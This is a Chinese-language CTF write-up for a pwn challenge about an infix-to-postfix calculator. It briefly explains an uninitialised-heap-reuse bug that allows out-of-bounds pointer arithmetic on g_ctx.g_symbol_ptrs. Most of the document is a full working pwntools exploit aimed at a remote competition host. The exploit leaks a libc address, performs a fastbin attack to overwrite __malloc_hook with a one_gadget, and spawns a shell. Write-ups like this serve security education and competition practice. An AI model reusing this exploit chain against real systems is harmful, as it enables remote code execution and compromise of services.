第六题兵刃相向 wp

思路

一个中序表达式转后序表达式计算的程序，parse_infix_expression函数和process_infix_token函数检查都比较严格，因此可以把攻击点着重放在evaluate_postfix_expression函数中。程序在取堆块的时候并没有将原有的堆块的数据置零，可以申请AB两个堆块，B堆块的name设置为运算符，将AB两堆块合并，再取出稍大的堆块，让postfix与B堆块的name对接，使得运算符比操作数要多。
图片描述
运算符多了，就可以通过这段代码对g_ctx.g_symbol_ptrs进行越界访问了。向上越界对g_ctx.g_symbol_ptrs里的堆块地址做增减运算，可以完成很多事了。

既然可以改变g_ctx.g_symbol_ptrs中的堆块地址，那pval就是可控的了。利用pval写入乘法运算符，之后利用乘法运算符越界将g_ctx.g_broken置零，泄露bin的地址，构造fastbin attack向malloc_hook写入one_gadget就可以得到shell了。
脚本写的很垃圾，有很大的优化空间。不过做出来就行了，也懒得改了。

exp如下:

100

101

102

103

104

105

106

107

from pwn import *
context.log_level = "debug"
local = False
if local:
    p = process("./ee")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    one_gadget = 0xf0364
    smallbin_offset = 0x7ffff7dd1b88 - 0x7ffff7a0d000
else:
    p = remote("121.36.145.157","10000")
    libc = ELF("./x64_libc.so.6")
    one_gadget = 0xf02a4
    smallbin_offset = 104 + 0x3C4B20
def Gdb():
    gdb.attach(p,"b *0x555555554000+0x22C3\ndirectory ./srcs/\n")
    #0x1bb7
def create(name, express):
    p.sendlineafter(": ", str(1))
    p.sendafter(": ", name)
    p.sendafter(": ", express)
def show(name):
    p.sendlineafter(": ", str(4))
    p.sendafter(": ", name)
def delete(name):
    p.sendlineafter(": ", str(2))
    p.sendafter(": ", name)
def revalute(name):
    p.sendlineafter(": ", str(3))
    p.sendafter(": ", name)
def getSize(size):
    return (size + 27 + 0x10)
 
 
create("aaa\n",("00000000000000*" * 6)[:-1]) #0 used
create("-" * 2,("00000000000000*" * 6)[:-1]) #1 used
create("ccc\n",("00000000000000*" * 6)[:-1]) #2 used
 
delete("aaa\n") #0 free
delete("-" * 2) #1 free
 
create("aaa\n",("00000000001-" + "000000000000-" *7)[:-1] + "00")
#0 used
length = "qwertyuiopsdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
for i in range(21-3):
    create(length[i]*2, "1+1")
create("*"*18, "10000 * 347063282342678 + 7882")
revalute("aaa\n")
revalute("\n")
for i in range(26):
    revalute("aaa\n")
for i in range(21-3):
    delete(length[i]*2)
 
revalute("\n")
 
create("aaa\n",("00000000000000*" * 6)[:-1]) #0 used
create("-" * 2,("00000000000000*" * 6)[:-1]) #1 used
create("ccc\n",("00000000000000*" * 6)[:-1]) #2 used
 
delete("aaa\n") #0 free
delete("-" * 2) #1 free
create("aaa\n",("00000000001-" + "000000000000-" *7)[:-1] + "00")
 
#create("zzz\n",("00000000008-" + "000000000000-" *5)[:-1] + "00") #fastbin attack
#create("uuu\n",("00000000008-" + "000000000000-" *5)[:-1] + "00")
#create("kkk\n",("00000000008-" + "000000000000-" *5)[:-1] + "00")
offset = (0x00005555557584a5 - 0x5555557580fd)
for i in range(offset):
    revalute("aaa\n")
show("1 +00000000!\n")
p.recvuntil("[*]value : ")
 
smallbin = int(p.recvline()[:-1])
#Gdb()
log.success("smallbin ==> " + hex(smallbin))
libc.address = smallbin - smallbin_offset
offset = (0x5555557580fd - 0x5555557580b0)
for i in range(offset):
    revalute("aaa\n")
delete("\n")
for i in range(21-6):
    create(length[i]*2, "1+1")
create("zzz\n",("00000000008-" + "0000000000-" *4)[:-1] + "00") #fastbin attack
create("uuu\n",("00000000008-" + "0000000000-" *4)[:-1] + "00")
create("kkk\n",("00000000008-" + "0000000000-" *4)[:-1] + "00")
create("ttt\n",("00000000008-" + "0000000000-" *4)[:-1] + "00")
offset = (0x0000555555758730 - 0x00005555557586c0)
for i in range(offset):
    revalute("aaa\n")
 
delete("kkk\n")
delete("uuu\n")
delete("\n")
#Gdb()
delete("aaa\n")
delete("qq\n")
delete("rr\n")
delete("uu\n")
create(p64(libc.sym['__malloc_hook']-0x23),("00000000008-" + "0000000000-" *4)[:-1] + "00")
create("deadC0de1",("00000000008-" + "0000000000-" *4)[:-1] + "00")
create("deadC0de2",("00000000008-" + "0000000000-" *4)[:-1] + "00")
one_gadget = libc.address + one_gadget
one_gadget = one_gadget / 4
create("a"*0x12, "{0} * 4 {1}".format(one_gadget,"-00000000"*4))
#Gdb()
create("getshell","1-1")
p.interactive()